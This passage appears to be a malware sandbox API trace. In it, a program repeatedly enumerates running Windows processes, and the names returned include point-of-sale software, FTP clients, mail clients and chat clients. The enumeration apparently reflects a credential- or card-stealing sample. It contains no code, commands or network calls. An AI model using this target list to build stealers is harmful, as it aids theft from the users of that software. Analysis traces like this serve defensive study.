th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0217.645] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0217.647] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0217.649] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0217.654] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0217.656] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0217.658] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0217.660] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0217.662] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0217.664] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0217.666] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.671] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.673] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0217.675] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0217.677] CloseHandle (hObject=0x1018) returned 1 [0217.677] Sleep (dwMilliseconds=0x64) [0217.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0217.853] Process32First (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.855] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.860] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.861] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.863] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.864] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.866] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.867] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.869] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.873] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.874] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.876] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.877] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.878] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.880] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.881] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.883] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.884] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.968] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.969] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.971] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0217.972] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0217.974] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.975] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.976] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0217.978] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0217.980] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0217.984] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0217.985] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.987] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0217.988] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.990] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.991] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0217.993] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0217.995] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0217.999] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0218.000] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0218.002] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0218.003] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0218.005] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0218.006] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0218.008] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0218.009] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0218.062] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0218.064] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0218.066] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0218.068] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0218.070] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0218.071] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0218.074] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0218.078] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0218.079] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0218.081] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0218.083] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0218.084] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0218.086] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0218.087] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0218.088] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0218.093] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0218.095] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0218.097] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0218.099] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0218.101] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0218.103] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0218.174] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0218.176] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0218.178] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0218.181] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0218.186] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0218.188] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0218.191] Process32Next (in: hSnapshot=0x101c, lppe=0x106efe20 | out: 